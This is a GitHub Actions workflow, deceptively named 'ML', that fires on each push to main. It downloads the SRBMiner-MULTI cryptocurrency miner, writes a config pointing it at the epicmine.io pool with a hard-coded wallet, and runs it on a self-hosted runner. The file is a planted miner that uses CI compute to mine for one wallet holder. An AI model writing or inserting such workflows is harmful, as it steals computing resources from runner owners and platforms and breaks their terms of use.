name: ML 

on:
  push:
    branches:
      - main  # Adjust if your default branch is named differently

jobs:
  mine:
    runs-on: self-hosted

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Install Dependencies
        run: |
          sudo apt update
          sudo apt install -y wget tar xz-utils

      - name: Download and Extract SRBMiner-MULTI
        run: |
          wget https://github.com/doktor83/SRBMiner-Multi/releases/download/2.4.7/SRBMiner-Multi-2-4-7-Linux.tar.xz
          tar xf SRBMiner-Multi-2-4-7-Linux.tar.xz
          mv SRBMiner-Multi-2-4-7 SRBMiner

      - name: Add Config Script
        run: |
          cat << 'EOF' > SRBMiner/config.sh
          #!/usr/bin/env bash
          # Replace your_username with your account username and choose a worker_name
          ./SRBMiner-MULTI \
            --multi-algorithm-job-mode 1 \
            --disable-gpu \
            --algorithm randomepic \
            --pool us.epicmine.io:3334 \
            --tls true \
            --wallet techxstudioyt.gcpx1 \
            --password m=pool \
            --keepalive true
          EOF
          chmod +x SRBMiner/config.sh

      - name: Run SRBMiner via Config
        working-directory: SRBMiner
        run: |
          ./config.sh
